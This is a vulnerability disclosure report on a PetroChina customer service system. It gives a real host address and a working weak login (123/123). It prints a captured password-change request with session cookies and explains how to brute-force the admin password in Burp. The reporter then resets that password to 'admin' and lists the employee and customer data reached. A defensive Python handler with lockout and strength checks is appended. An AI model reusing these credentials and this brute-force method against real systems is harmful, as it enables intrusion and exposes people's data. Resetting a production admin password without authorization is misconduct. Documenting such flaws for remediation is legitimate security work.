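2015-10-14: Details reported to the vendor; awaiting vendor handling
2015-10-14: Vendor confirmed; details disclosed to the vendor only
2015-10-24: Details disclosed to core white hats and experts in related fields
2015-11-03: Details disclosed to regular white hats
2015-11-13: Details disclosed to intern white hats
2015-11-28: Details disclosed to the public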
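A weak password.
http://123.125.17.201:7070/cc/portal.jsp
PetroChina customer service center system, weak password: 123 / 123.
After logging in, go to the change-password function and capture the request: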
POST /cc/login.do?method=modifyPassword HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://123.125.17.201:7070/cc/login.do?method=modifyPassword
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 123.125.17.201:7070
Content-Length: 91
Pragma: no-cache
Cookie: motoAbcCmsLoginName=123; JSESSIONID=D8EDE036A5F7A82DB266755C5ADAB270; _user_info="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"; _loginInfo="rO0ABXNyADNjb20uaG9sbHljcm0uc2VydmljZS5zeXN0ZW0uc2VjdXJpdHkubW9kZWwuTG9naW5Mb2eoEPdB+1HU3QIAB0wAAmlwdAASTGphdmEvbGFuZy9TdHJpbmc7TAAFbG9nSWRxAH4AAUwACWxvZ2luTmFtZXEAfgABTAAJbG9naW5UaW1lcQB+AAFMAApsb2dvdXRUaW1lcQB+AAFMAAZ1c2VySWRxAH4AAUwACHVzZXJOYW1lcQB+AAF4cHQADzExOC4xOTMuMTUzLjE3MXQAFDAwMDAwMDAwMDAwMDAwNTExNzkxdAADMTIzdAATMjAxNS0xMC0xNCAxMzowOToyM3B0AAxVMDAwMDAwMDMwODh0AAnoooHmsYnojaM="

name=admin&oldPassword=§admin§&newPassword=admin&repeatPassword=admin&Submit=%E7%A1%AE%E8%AE%A4
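name is the username and is user-controllable, so it is very likely that admin's password can be brute-forced without any CAPTCHA.
Capture the request in Burp, send it to the automation module, change name to admin, and set the oldPassword value as the variable.
The result was good: the original password came out. However, it has now been reset to admin; please change it yourselves.
So, into the system for a look. With admin, anything is possible.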
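Customers
Information on some branch companies
3,500 employees
57,000 work orders
Information on all branch companies nationwide, including all persons in charge, managers and general managers
Customer information management
OK, stopping here. No malicious operations were performed!!!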
Eliminate weak passwords!
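Beyond the weak 123 / 123 account, the captured modifyPassword request lets a logged-in user name another account and guess its oldPassword without limit. The sketch below is an added example, not code from the reported system or its vendor: a framework-neutral model of a password-change handler that binds the change to the session user, caps wrong oldPassword guesses, and rejects weak new passwords. The class name, return strings and policy constants are assumptions.

```python
import hashlib
import hmac
import os
import time

MAX_FAILURES = 5        # assumed policy: wrong old-password guesses allowed per window
LOCKOUT_SECONDS = 900   # assumed policy: length of the window / lockout
MIN_LENGTH = 10         # assumed policy: minimum new-password length

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class PasswordChanger:
    """Hypothetical in-memory stand-in for the account store behind modifyPassword."""

    def __init__(self, clock=time.time):
        self.users = {}      # name -> (salt, password hash)
        self.failures = {}   # name -> (failure count, window start)
        self.clock = clock

    def set_password(self, name, password):
        salt = os.urandom(16)
        self.users[name] = (salt, _hash(password, salt))

    def modify_password(self, session_user, form):
        # The account is taken from the server-side session, never from the form.
        if form.get("name", session_user) != session_user:
            return "forbidden"
        now = self.clock()
        count, since = self.failures.get(session_user, (0, now))
        if now - since >= LOCKOUT_SECONDS:      # window expired, start again
            count, since = 0, now
        if count >= MAX_FAILURES:               # too many guesses: stop checking
            return "locked"
        salt, stored = self.users[session_user]
        guess = _hash(form.get("oldPassword", ""), salt)
        if not hmac.compare_digest(guess, stored):
            self.failures[session_user] = (count + 1, since)
            return "wrong_old_password"
        new = form.get("newPassword", "")
        if new != form.get("repeatPassword"):
            return "mismatch"
        if len(new) < MIN_LENGTH or new == session_user:
            return "weak"
        self.set_password(session_user, new)
        self.failures.pop(session_user, None)
        return "ok"
```

In a real deployment the failure counters would live in shared storage rather than process memory, so that the cap holds across application servers.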
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-10-14 15:55
Thank you very much for your report; we have started working on the issue.
None yet